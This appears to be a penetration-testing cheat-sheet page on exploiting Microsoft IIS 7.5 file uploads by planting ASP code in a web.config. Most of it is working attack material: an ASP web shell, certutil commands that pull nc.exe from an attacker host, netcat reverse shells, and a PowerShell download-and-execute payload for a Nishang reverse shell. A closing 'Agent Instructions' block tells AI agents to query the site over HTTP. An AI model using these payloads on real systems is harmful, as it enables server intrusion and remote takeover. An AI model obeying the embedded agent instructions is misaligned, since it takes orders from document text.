# IIS

## IIS Versions

* <https://en.wikipedia.org/wiki/Internet_Information_Services>
* REF: [IIS6WebDav](/04-webapps/iis6-webdav.md)

```
80 http Microsoft IIS httpd 7.5

IIS 7.5 = Windows 2008 R2
```

## IIS Uploads

* If you can upload to an IIS site, keep trying to see which extensions are allowed

```
test.txt        ..fail
test.asp        ..fail
test.aspx       ..fail
test.jpg        ..ok
web.config      ..ok - we can exploit
```

## RCE webconfig upload

* Old Version of IIS 7.5 that accepts fileuploads
* We can transfer our 'web.config' that includes some evil-aspx at the bottom
* <https://poc-server.com/blog/2018/05/22/rce-by-uploading-a-web-config/>
* <https://soroush.secproject.com/blog/tag/unrestricted-file-upload/>
* REF: [RevWebShellsAsp](/03-getting-in/03-reverseshell-php.md#asp-webshell)

```
-------------------------------
vi web.config         ..evil asp code at bottom
Response.write(1+2)   ..test will equal 3

-------------------------------
cat /opt/shells/web.aspx

<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c whoami")
Set cmd = rs.Exec("cmd /c ping 10.x.x.x")
o = cmd.StdOut.Readall()
Response.write(o)
%>

-------------------------------
Execute:
http://10.x.x.x/UploadedFiles/web.config

-------------------------------
Catch a ping (did my command work?)
tcpdump -i tun0 icmp
```

## Easy

```
-----------------------
We will use web.config exploit

First web.config will download nc
python -m SimpleHTTPServer 8080
rs.Exec("cmd /c certutil -urlcache -f http://10.x.x.x:8080/nc.exe C:\Windows\Temp\nc.exe")

Second web.config will execute nc reverse
rs.Exec("cmd /c C:\Windows\Temp\nc.exe 10.x.x.x 4444 -e cmd.exe")
nc -nvlp 4444
whoami
merlin
systeminfo


```

```

-----------------------
google iis rce upload

Set cmd1 = wShell1.Exec("certutil -urlcache -split -f http://10.x.x.x:8080/nc.exe C:\\users\\public\\nc.exe")
Set cmd1 = wShell1.Exec("cmd /c c:\users\public\nc.exe 10.x.x.x 4444 -e c:\windows\system32\cmd.exe")

```

```
0xdf wrote this easy one:
To download our Nishang reverse shell and execute it

prep
https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1
Add a reverse call as the last line:
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.5 -Port 443
share with python

<%@ Language=VBScript %>
<%
  call Server.CreateObject("WSCRIPT.SHELL").Run("cmd.exe /c powershell.exe -c iex(new-object net.webclient).downloadstring('http://10.x.x.x/Invoke-PowerShellTcp.ps1')")
%>
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://pentest.mxhx.org/04-webapps/iis.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.